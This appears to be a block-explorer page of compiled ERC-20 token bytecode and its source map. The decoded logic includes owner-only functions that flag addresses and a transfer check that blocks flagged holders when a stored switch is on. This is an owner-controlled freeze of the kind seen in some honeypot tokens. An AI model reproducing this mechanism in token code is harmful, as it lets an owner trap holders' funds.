554905090565b60006103e6848484610c1d565b6000600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610431610a4a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156104b1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104a89061137f565b60405180910390fd5b6104ce856104bd610a4a565b85846104c991906114e7565b610a52565b60019150509392505050565b60007f0000000000000000000000000000000000000000000000000000000000000009905090565b60006105a461050f610a4a565b84846003600061051d610a4a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461059f9190611491565b610a52565b6001905092915050565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461063c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106339061139f565b60405180910390fd5b6001600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461076e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107659061139f565b60405180910390fd5b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60606009805461082e906115a3565b80601f016020809104026020016040519081016040528092919081815260200182805461085a906115a3565b80156108a75780601f1061087c576101008083540402835291602001916108a7565b820191906000526020600020905b81548152906001019060200180831161088a57829003601f168201915b5050505050905090565b600080600360006108c0610a4a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561097d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109749061141f565b60405180910390fd5b61099a610988610a4a565b85858461099591906114e7565b610a52565b600191505092915050565b60006109b96109b2610a4a565b8484610c1d565b6001905092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610ac2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ab9906113ff565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610b32576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b299061133f565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c10919061143f565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c8d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c84906113bf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610cfd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cf4906112ff565b60405180910390fd5b60008111610d40576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d379061131f565b60405180910390fd5b600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610de15750600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610e3d5760001515600660009054906101000a900460ff16151514610e3c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e33906113df565b60405180910390fd5b5b610e48838383610fdf565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610ecf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ec69061135f565b60405180910390fd5b8181610edb91906114e7565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610f6d9190611491565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610fd1919061143f565b60405180910390a350505050565b505050565b600081359050610ff3816118e8565b92915050565b600081359050611008816118ff565b92915050565b60006020828403121561102057600080fd5b600061102e84828501610fe4565b91505092915050565b6000806040838503121561104a57600080fd5b600061105885828601610fe4565b925050602061106985828601610fe4565b9150509250929050565b60008060006060848603121561108857600080fd5b600061109686828701610fe4565b93505060206110a786828701610fe4565b92505060406110b886828701610ff9565b9150509250925092565b600080604083850312156110d557600080fd5b60006110e385828601610fe4565b92505060206110f485828601610ff9565b9150509250929050565b6111078161152d565b82525050565b600061111882611475565b6111228185611480565b9350611132818560208601611570565b61113b81611633565b840191505092915050565b6000611153602383611480565b915061115e82611644565b604082019050919050565b6000611176602983611480565b915061118182611693565b604082019050919050565b6000611199602283611480565b91506111a4826116e2565b604082019050919050565b60006111bc602683611480565b91506111c782611731565b604082019050919050565b60006111df602883611480565b91506111ea82611780565b604082019050919050565b6000611202602083611480565b915061120d826117cf565b602082019050919050565b6000611225602583611480565b9150611230826117f8565b604082019050919050565b6000611248600083611480565b915061125382611847565b600082019050919050565b600061126b602483611480565b91506112768261184a565b604082019050919050565b600061128e602583611480565b915061129982611899565b604082019050919050565b6112ad81611559565b82525050565b6112bc81611563565b82525050565b60006020820190506112d760008301846110fe565b92915050565b600060208201905081810360008301526112f7818461110d565b905092915050565b6000602082019050818103600083015261131881611146565b9050919050565b6000602082019050818103600083015261133881611169565b9050919050565b600060208201905081810360008301526113588161118c565b9050919050565b60006020820190508181036000830152611378816111af565b9050919050565b60006020820190508181036000830152611398816111d2565b9050919050565b600060208201905081810360008301526113b8816111f5565b9050919050565b600060208201905081810360008301526113d881611218565b9050919050565b600060208201905081810360008301526113f88161123b565b9050919050565b600060208201905081810360008301526114188161125e565b9050919050565b6000602082019050818103600083015261143881611281565b9050919050565b600060208201905061145460008301846112a4565b92915050565b600060208201905061146f60008301846112b3565b92915050565b600081519050919050565b600082825260208201905092915050565b600061149c82611559565b91506114a783611559565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156114dc576114db6115d5565b5b828201905092915050565b60006114f282611559565b91506114fd83611559565b9250828210156115105761150f6115d5565b5b828203905092915050565b600061152682611539565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b8381101561158e578082015181840152602081019050611573565b8381111561159d576000848401525b50505050565b600060028204905060018216806115bb57607f821691505b602082108114156115cf576115ce611604565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f5472616e7366657220616d6f756e74206d75737420626520677261746572207460008201527f6861746e207a65726f0000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b50565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6118f18161151b565b81146118fc57600080fd5b50565b61190881611559565b811461191357600080fd5b5056fea2646970667358221220f9efac66bb28798a964ca7b4ecff0028176758831364ea2fc24dfcbe845dfe1d64736f6c63430008020033

Deployed Bytecode Sourcemap

15470:559:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6730:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9255:169;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8208:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9906:418;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15920:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10733:215;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7913:106;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8379:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7792:113;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8027:116;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6949:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11451:375;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8719:175;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8957:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6730:100;6784:13;6817:5;6810:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6730:100;:::o;9255:169::-;9338:4;9355:39;9364:12;:10;:12::i;:::-;9378:7;9387:6;9355:8;:39::i;:::-;9412:4;9405:11;;9255:169;;;;:::o;8208:108::-;8269:7;8296:12;;8289:19;;8208:108;:::o;9906:418::-;10012:4;10029:36;10039:6;10047:9;10058:6;10029:9;:36::i;:::-;10076:24;10103:11;:19;10115:6;10103:19;;;;;;;;;;;;;;;:33;10123:12;:10;:12::i;:::-;10103:33;;;;;;;;;;;;;;;;10076:60;;10175:6;10155:16;:26;;10147:79;;;;;;;;;;;;:::i;:::-;;;;;;;;;10237:57;10246:6;10254:12;:10;:12::i;:::-;10287:6;10268:16;:25;;;;:::i;:::-;10237:8;:57::i;:::-;10312:4;10305:11;;;9906:418;;;;;:::o;15920:100::-;15978:5;16003:9;15996:16;;15920:100;:::o;10733:215::-;10821:4;10838:80;10847:12;:10;:12::i;:::-;10861:7;10907:10;10870:11;:25;10882:12;:10;:12::i;:::-;10870:25;;;;;;;;;;;;;;;:34;10896:7;10870:34;;;;;;;;;;;;;;;;:47;;;;:::i;:::-;10838:8;:80::i;:::-;10936:4;10929:11;;10733:215;;;;:::o;7913:106::-;6585:10;6575:20;;:6;;;;;;;;;;:20;;;6567:65;;;;;;;;;;;;:::i;:::-;;;;;;;;;8007:4:::1;7978:16;:26;7995:8;7978:26;;;;;;;;;;;;;;;;:33;;;;;;;;;;;;;;;;;;7913:106:::0;:::o;8379:127::-;8453:7;8480:9;:18;8490:7;8480:18;;;;;;;;;;;;;;;;8473:25;;8379:127;;;:::o;7792:113::-;6585:10;6575:20;;:6;;;;;;;;;;:20;;;6567:65;;;;;;;;;;;;:::i;:::-;;;;;;;;;7892:5:::1;7863:16;:26;7880:8;7863:26;;;;;;;;;;;;;;;;:34;;;;;;;;;;;;;;;;;;7792:113:::0;:::o;8027:116::-;8085:4;8109:16;:26;8126:8;8109:26;;;;;;;;;;;;;;;;;;;;;;;;;8102:33;;8027:116;;;:::o;6949:104::-;7005:13;7038:7;7031:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6949:104;:::o;11451:375::-;11544:4;11561:24;11588:11;:25;11600:12;:10;:12::i;:::-;11588:25;;;;;;;;;;;;;;;:34;11614:7;11588:34;;;;;;;;;;;;;;;;11561:61;;11661:15;11641:16;:35;;11633:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;11729:67;11738:12;:10;:12::i;:::-;11752:7;11780:15;11761:16;:34;;;;:::i;:::-;11729:8;:67::i;:::-;11814:4;11807:11;;;11451:375;;;;:::o;8719:175::-;8805:4;8822:42;8832:12;:10;:12::i;:::-;8846:9;8857:6;8822:9;:42::i;:::-;8882:4;8875:11;;8719:175;;;;:::o;8957:151::-;9046:7;9073:11;:18;9085:5;9073:18;;;;;;;;;;;;;;;:27;9092:7;9073:27;;;;;;;;;;;;;;;;9066:34;;8957:151;;;;:::o;4029:98::-;4082:7;4109:10;4102:17;;4029:98;:::o;14289:344::-;14408:1;14391:19;;:5;:19;;;;14383:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;14489:1;14470:21;;:7;:21;;;;14462:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;14571:6;14541:11;:18;14553:5;14541:18;;;;;;;;;;;;;;;:27;14560:7;14541:27;;;;;;;;;;;;;;;:36;;;;14609:7;14593:32;;14602:5;14593:32;;;14618:6;14593:32;;;;;;:::i;:::-;;;;;;;;14289:344;;;:::o;12323:772::-;12447:1;12429:20;;:6;:20;;;;12421:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;12531:1;12510:23;;:9;:23;;;;12502:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;12601:1;12592:6;:10;12584:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;12663:16;:24;12680:6;12663:24;;;;;;;;;;;;;;;;;;;;;;;;;:55;;;;12691:16;:27;12708:9;12691:27;;;;;;;;;;;;;;;;;;;;;;;;;12663:55;12659:88;;;12737:5;12728:14;;:5;;;;;;;;;;;:14;;;12720:27;;;;;;;;;;;;:::i;:::-;;;;;;;;;12659:88;12758:47;12779:6;12787:9;12798:6;12758:20;:47::i;:::-;12816:21;12840:9;:17;12850:6;12840:17;;;;;;;;;;;;;;;;12816:41;;12893:6;12876:13;:23;;12868:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;12989:6;12973:13;:22;;;;:::i;:::-;12953:9;:17;12963:6;12953:17;;;;;;;;;;;;;;;:42;;;;13030:6;13006:9;:20;13016:9;13006:20;;;;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;13069:9;13052:35;;13061:6;13052:35;;;13080:6;13052:35;;;;;;:::i;:::-;;;;;;;;12323:772;;;;:::o;15236:92::-;;;;:::o;7:139:1:-;;91:6;78:20;69:29;;107:33;134:5;107:33;:::i;:::-;59:87;;;;:::o;152:139::-;;236:6;223:20;214:29;;252:33;279:5;252:33;:::i;:::-;204:87;;;;:::o;297:262::-;;405:2;393:9;384:7;380:23;376:32;373:2;;;421:1;418;411:12;373:2;464:1;489:53;534:7;525:6;514:9;510:22;489:53;:::i;:::-;479:63;;435:117;363:196;;;;:::o;565:407::-;;;690:2;678:9;669:7;665:23;661:32;658:2;;;706:1;703;696:12;658:2;749:1;774:53;819:7;810:6;799:9;795:22;774:53;:::i;:::-;764:63;;720:117;876:2;902:53;947:7;938:6;927:9;923:22;902:53;:::i;:::-;892:63;;847:118;648:324;;;;;:::o;978:552::-;;;;1120:2;1108:9;1099:7;1095:23;1091:32;1088:2;;;1136:1;1133;1126:12;1088:2;1179:1;1204:53;1249:7;1240:6;1229:9;1225:22;1204:53;:::i;:::-;1194:63;;1150:117;1306:2;1332:53;1377:7;1368:6;1357:9;1353:22;1332:53;:::i;:::-;1322:63;;1277:118;1434:2;1460:53;1505:7;1496:6;1485:9;1481:22;1460:53;:::i;:::-;1450:63;;1405:118;1078:452;;;;;:::o;1536:407::-;;;1661:2;1649:9;1640:7;1636:23;1632:32;1629:2;;;1677:1;1674;1667:12;1629:2;1720:1;1745:53;1790:7;1781:6;1770:9;1766:22;1745:53;:::i;:::-;1735:63;;1691:117;1847:2;1873:53;1918:7;1909:6;1898:9;1894:22;1873:53;:::i;:::-;1863:63;;1818:118;1619:324;;;;;:::o;1949:109::-;2030:21;2045:5;2030:21;:::i;:::-;2025:3;2018:34;2008:50;;:::o;2064:364::-;;2180:39;2213:5;2180:39;:::i;:::-;2235:71;2299:6;2294:3;2235:71;:::i;:::-;2228:78;;2315:52;2360:6;2355:3;2348:4;2341:5;2337:16;2315:52;:::i;:::-;2392:29;2414:6;2392:29;:::i;:::-;2387:3;2383:39;2376:46;;2156:272;;;;;:::o;2434:366::-;;2597:67;2661:2;2656:3;2597:67;:::i;:::-;2590:74;;2673:93;2762:3;2673:93;:::i;:::-;2791:2;2786:3;2782:12;2775:19;;2580:220;;;:::o;2806:366::-;;2969:67;3033:2;3028:3;2969:67;:::i;:::-;2962:74;;3045:93;3134:3;3045:93;:::i;:::-;3163:2;3158:3;3154:12;3147:19;;2952:220;;;:::o;3178:366::-;;3341:67;3405:2;3400:3;3341:67;:::i;:::-;3334:74;;3417:93;3506:3;3417:93;:::i;:::-;3535:2;3530:3;3526:12;3519:19;;3324:220;;;:::o;3550:366::-;;3713:67;3777:2;3772:3;3713:67;:::i;:::-;3706:74;;3789:93;3878:3;3789:93;:::i;:::-;3907:2;3902:3;3898:12;3891:19;;3696:220;;;:::o;3922:366::-;;4085:67;4149:2;4144:3;4085:67;:::i;:::-;4078:74;;4161:93;4250:3;4161:93;:::i;:::-;4279:2;4274:3;4270:12;4263:19;;4068:220;;;:::o;4294:366::-;;4457:67;4521:2;4516:3;4457:67;:::i;:::-;4450:74;;4533:93;4622:3;4533:93;:::i;:::-;4651:2;4646:3;4642:12;4635:19;;4440:220;;;:::o;4666:366::-;;4829:67;4893:2;4888:3;4829:67;:::i;:::-;4822:74;;4905:93;4994:3;4905:93;:::i;:::-;5023:2;5018:3;5014:12;5007:19;;4812:220;;;:::o;5038:364::-;;5201:66;5265:1;5260:3;5201:66;:::i;:::-;5194:73;;5276:93;5365:3;5276:93;:::i;:::-;5394:1;5389:3;5385:11;5378:18;;5184:218;;;:::o;5408:366::-;;5571:67;5635:2;5630:3;5571:67;:::i;:::-;5564:74;;5647:93;5736:3;5647:93;:::i;:::-;5765:2;5760:3;5756:12;5749:19;;5554:220;;;:::o;5780:366::-;;5943:67;6007:2;6002:3;5943:67;:::i;:::-;5936:74;;6019:93;6108:3;6019:93;:::i;:::-;6137:2;6132:3;6128:12;6121:19;;5926:220;;;:::o;6152:118::-;6239:24;6257:5;6239:24;:::i;:::-;6234:3;6227:37;6217:53;;:::o;6276:112::-;6359:22;6375:5;6359:22;:::i;:::-;6354:3;6347:35;6337:51;;:::o;6394:210::-;;6519:2;6508:9;6504:18;6496:26;;6532:65;6594:1;6583:9;6579:17;6570:6;6532:65;:::i;:::-;6486:118;;;;:::o;6610:313::-;;6761:2;6750:9;6746:18;6738:26;;6810:9;6804:4;6800:20;6796:1;6785:9;6781:17;6774:47;6838:78;6911:4;6902:6;6838:78;:::i;:::-;6830:86;;6728:195;;;;:::o;6929:419::-;;7133:2;7122:9;7118:18;7110:26;;7182:9;7176:4;7172:20;7168:1;7157:9;7153:17;7146:47;7210:131;7336:4;7210:131;:::i;:::-;7202:139;;7100:248;;;:::o;7354:419::-;;7558:2;7547:9;7543:18;7535:26;;7607:9;7601:4;7597:20;7593:1;7582:9;7578:17;7571:47;7635:131;7761:4;7635:131;:::i;:::-;7627:139;;7525:248;;;:::o;7779:419::-;;7983:2;7972:9;7968:18;7960:26;;8032:9;8026:4;8022:20;8018:1;8007:9;8003:17;7996:47;8060:131;8186:4;8060:131;:::i;:::-;8052:139;;7950:248;;;:::o;8204:419::-;;8408:2;8397:9;8393:18;8385:26;;8457:9;8451:4;8447:20;8443:1;8432:9;8428:17;8421:47;8485:131;8611:4;8485:131;:::i;:::-;8477:139;;8375:248;;;:::o;8629:419::-;;8833:2;8822:9;8818:18;8810:26;;8882:9;8876:4;8872:20;8868:1;8857:9;8853:17;8846:47;8910:131;9036:4;8910:131;:::i;:::-;8902:139;;8800:248;;;:::o;9054:419::-;;9258:2;9247:9;9243:18;9235:26;;9307:9;9301:4;9297:20;9293:1;9282:9;9278:17;9271:47;9335:131;9461:4;9335:131;:::i;:::-;9327:139;;9225:248;;;:::o;9479:419::-;;9683:2;9672:9;9668:18;9660:26;;9732:9;9726:4;9722:20;9718:1;9707:9;9703:17;9696:47;9760:131;9886:4;9760:131;:::i;:::-;9752:139;;9650:248;;;:::o;9904:419::-;;10108:2;10097:9;10093:18;10085:26;;10157:9;10151:4;10147:20;10143:1;10132:9;10128:17;10121:47;10185:131;10311:4;10185:131;:::i;:::-;10177:139;;10075:248;;;:::o;10329:419::-;;10533:2;10522:9;10518:18;10510:26;;10582:9;10576:4;10572:20;10568:1;10557:9;10553:17;10546:47;10610:131;10736:4;10610:131;:::i;:::-;10602:139;;10500:248;;;:::o;10754:419::-;;10958:2;10947:9;10943:18;10935:26;;11007:9;11001:4;10997:20;10993:1;10982:9;10978:17;10971:47;11035:131;11161:4;11035:131;:::i;:::-;11027:139;;10925:248;;;:::o;11179:222::-;;11310:2;11299:9;11295:18;11287:26;;11323:71;11391:1;11380:9;11376:17;11367:6;11323:71;:::i;:::-;11277:124;;;;:::o;11407:214::-;;11534:2;11523:9;11519:18;11511:26;;11547:67;11611:1;11600:9;11596:17;11587:6;11547:67;:::i;:::-;11501:120;;;;:::o;11627:99::-;;11713:5;11707:12;11697:22;;11686:40;;;:::o;11732:169::-;;11850:6;11845:3;11838:19;11890:4;11885:3;11881:14;11866:29;;11828:73;;;;:::o;11907:305::-;;11966:20;11984:1;11966:20;:::i;:::-;11961:25;;12000:20;12018:1;12000:20;:::i;:::-;11995:25;;12154:1;12086:66;12082:74;12079:1;12076:81;12073:2;;;12160:18;;:::i;:::-;12073:2;12204:1;12201;12197:9;12190:16;;11951:261;;;;:::o;12218:191::-;;12278:20;12296:1;12278:20;:::i;:::-;12273:25;;12312:20;12330:1;12312:20;:::i;:::-;12307:25;;12351:1;12348;12345:8;12342:2;;;12356:18;;:::i;:::-;12342:2;12401:1;12398;12394:9;12386:17;;12263:146;;;;:::o;12415:96::-;;12481:24;12499:5;12481:24;:::i;:::-;12470:35;;12460:51;;;:::o;12517:90::-;;12594:5;12587:13;12580:21;12569:32;;12559:48;;;:::o;12613:126::-;;12690:42;12683:5;12679:54;12668:65;;12658:81;;;:::o;12745:77::-;;12811:5;12800:16;;12790:32;;;:::o;12828:86::-;;12903:4;12896:5;12892:16;12881:27;;12871:43;;;:::o;12920:307::-;12988:1;12998:113;13012:6;13009:1;13006:13;12998:113;;;13097:1;13092:3;13088:11;13082:18;13078:1;13073:3;13069:11;13062:39;13034:2;13031:1;13027:10;13022:15;;12998:113;;;13129:6;13126:1;13123:13;13120:2;;;13209:1;13200:6;13195:3;13191:16;13184:27;13120:2;12969:258;;;;:::o;13233:320::-;;13314:1;13308:4;13304:12;13294:22;;13361:1;13355:4;13351:12;13382:18;13372:2;;13438:4;13430:6;13426:17;13416:27;;13372:2;13500;13492:6;13489:14;13469:18;13466:38;13463:2;;;13519:18;;:::i;:::-;13463:2;13284:269;;;;:::o;13559:180::-;13607:77;13604:1;13597:88;13704:4;13701:1;13694:15;13728:4;13725:1;13718:15;13745:180;13793:77;13790:1;13783:88;13890:4;13887:1;13880:15;13914:4;13911:1;13904:15;13931:102;;14023:2;14019:7;14014:2;14007:5;14003:14;13999:28;13989:38;;13979:54;;;:::o;14039:222::-;14179:34;14175:1;14167:6;14163:14;14156:58;14248:5;14243:2;14235:6;14231:15;14224:30;14145:116;:::o;14267:228::-;14407:34;14403:1;14395:6;14391:14;14384:58;14476:11;14471:2;14463:6;14459:15;14452:36;14373:122;:::o;14501:221::-;14641:34;14637:1;14629:6;14625:14;14618:58;14710:4;14705:2;14697:6;14693:15;14686:29;14607:115;:::o;14728:225::-;14868:34;14864:1;14856:6;14852:14;14845:58;14937:8;14932:2;14924:6;14920:15;14913:33;14834:119;:::o;14959:227::-;15099:34;15095:1;15087:6;15083:14;15076:58;15168:10;15163:2;15155:6;15151:15;15144:35;15065:121;:::o;15192:182::-;15332:34;15328:1;15320:6;15316:14;15309:58;15298:76;:::o;15380:224::-;15520:34;15516:1;15508:6;15504:14;15497:58;15589:7;15584:2;15576:6;15572:15;15565:32;15486:118;:::o;15610:114::-;15716:8;:::o;15730:223::-;15870:34;15866:1;15858:6;15854:14;15847:58;15939:6;15934:2;15926:6;15922:15;15915:31;15836:117;:::o;15959:224::-;16099:34;16095:1;16087:6;16083:14;16076:58;16168:7;16163:2;16155:6;16151:15;16144:32;16065:118;:::o;16189:122::-;16262:24;16280:5;16262:24;:::i;:::-;16255:5;16252:35;16242:2;;16301:1;16298;16291:12;16242:2;16232:79;:::o;16317:122::-;16390:24;16408:5;16390:24;:::i;:::-;16383:5;16380:35;16370:2;;16429:1;16426;16419:12;16370:2;16360:79;:::o

Swarm Source

ipfs://f9efac66bb28798a964ca7b4ecff0028176758831364ea2fc24dfcbe845dfe1d
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.